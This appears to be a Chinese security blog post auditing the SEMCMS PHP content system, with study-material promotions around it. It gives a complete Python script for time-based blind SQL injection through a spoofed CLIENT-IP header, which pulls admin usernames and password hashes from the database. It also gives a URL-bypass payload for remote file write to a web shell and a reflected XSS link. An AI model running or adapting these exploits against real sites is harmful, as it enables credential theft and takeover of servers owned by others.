源码下载
https://www.sem-cms.cn/wenda/view-52.html
看一下代码逻辑结构
include_once 'db_con.php'; 数据库配置
include_once 'Ant_Check.php'; sql注入检测
include_once 'Ant_Class.php'; 数据操作
include_once 'Ant_Contrl.php'; 一些函数封装
include_once 'class.phpmailer.php'; 邮件操作
include_once 'Ant_Config.php'; 全局设置
include_once 'Ant_Shop.php'; 商品属性的一些设置函数
发现它只是对GET就行了过滤!
看看有没有其它方式的参数获取!
Core/Program/Ant_Contrl.php 里
GetIp 函数返回ip! 这里我们可控!而且不受过滤!
调用的地方有:
咱就用 Search_Data这个函数!
测试:
注入成功
→_→点击查看学习资料·攻略
- 2000多本网络安全系列电子书
- 网络安全标准题库资料
- 项目源码
- 网络安全基础入门、Linux、web安全、攻防方面的视频
- 网络安全学习路线图
poc
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/11/28 18:28
# @Author : upload
# @File : aa.py
# @Software: PyCharm
import requests
proxy = '127.0.0.1:8086'
proxies = {
'http': 'http://' + proxy,
'https': 'https://' + proxy,
}
url = "http://anxun.com:80/Template/Default/File/search.php"
cookies = {"XDEBUG_SESSION": "PHPSTORM", "PHPSESSID": "moigehp8edd6g71hltptjjogs4", "UM_distinctid": "17d6e9309a5d7-0e967d747fce92-d7e163f-144000-17d6e9309a6a63", "CNZZDATA1279754351": "673588782-1638237672-null%7C1638237672"}
headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://anxun.com", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://anxun.com/Template/Default/File/search.php", "CLIENT-IP": "'or sleep(3) or'", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
data = {"search": "1"}
print(headers['CLIENT-IP'])
flag=''
for i in range(1,100):
f1=flag
top=127
low=33
while low<=top:
mid = (top + low) // 2
print(i,mid)
payload1 = '\'or if((ord(substr((select(group_concat(user_name,"~",user_ps,"~",user_name))from(sc_user)),{},1))={}),sleep(3),0) or\''.format(i,mid)
payload2 = '\'or if((ord(substr((select(group_concat(user_name,"~",user_ps,"~",user_name))from(sc_user)),{},1))>{}),sleep(3),0) or\''.format(i,mid)
headers['CLIENT-IP'] = payload1
try:
r1 = requests.post(url, data=data,headers=headers,timeout=2,proxies=proxies)
print(headers)
except:
flag +=chr(mid)
print(flag)
break
else:
try:
headers['CLIENT-IP'] = payload2
r2 = requests.post(url, data=data,headers=headers,timeout=2,proxies=proxies)
except:
low = mid + 1
else:
top = mid - 1
if flag == f1:
break
print(flag)
解密后 semcms
其它地方的sql注入应该也可以!
后台挖掘
有一个任意文件读取!
从远程读取文件!
最后可以保存它
不过要绕过限制:
用
payload:
url=http://sem-cms.cn@0.0.0.0/index.php
成功写入:
getshell
xss
反射型
http://anxun.com/r20A88_A2M/Ant_M_Delivery.php?page=adadad&aed=a&sortID="<script>alert('XSS')</script>"
最后
感谢你能够看完这篇文章,如果有需要学习资料的话可以关注回复“资料”即可获取